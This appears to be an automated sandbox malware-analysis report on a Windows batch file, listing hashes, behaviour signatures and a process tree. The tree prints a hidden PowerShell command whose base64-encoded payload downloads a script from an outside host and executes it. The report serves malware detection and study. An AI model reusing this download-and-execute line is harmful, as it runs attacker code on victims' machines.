Overview

overview

10

Static

static

ph2408.bat

windows7_x64

10

ph2408.bat

windows10_x64

8

Analysis

  • max time kernel
    150s
  • max time network
    105s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    22-09-2021 01:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ph2408.bat

  • Size

    543B

  • MD5

    f134912b3ebfb9d02e46c9dcac30b47f

  • SHA1

    0418ee735232fea50d72d1b5f454403cc08fe45e

  • SHA256

    ac2acbb0656b7b54c2c62e58cbb013f07500ec0ec85b73aadd9648fe6c4399be

  • SHA512

    0505366c220c9ef61890ed201a436f51b964234d8670b3d069f8418af079aa9f1556eeeabfdf40fd7928881cace95e994f3ca38ff965f7241f6be94045a22e92

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Modifies registry class 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ph2408.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:664
    • C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:424

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/424-114-0x0000000000000000-mapping.dmp

    Download

  • memory/424-119-0x0000024A6B4F0000-0x0000024A6B4F1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/424-124-0x0000024A6B6C0000-0x0000024A6B6C1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/424-125-0x0000024A6B6B0000-0x0000024A6B6B2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/424-126-0x0000024A6B6B3000-0x0000024A6B6B5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/424-127-0x0000024A6B6B6000-0x0000024A6B6B8000-memory.dmp

    Filesize

    8KB

    Download

  • memory/424-835-0x0000024A6B6B8000-0x0000024A6B6BA000-memory.dmp

    Filesize

    8KB

    Download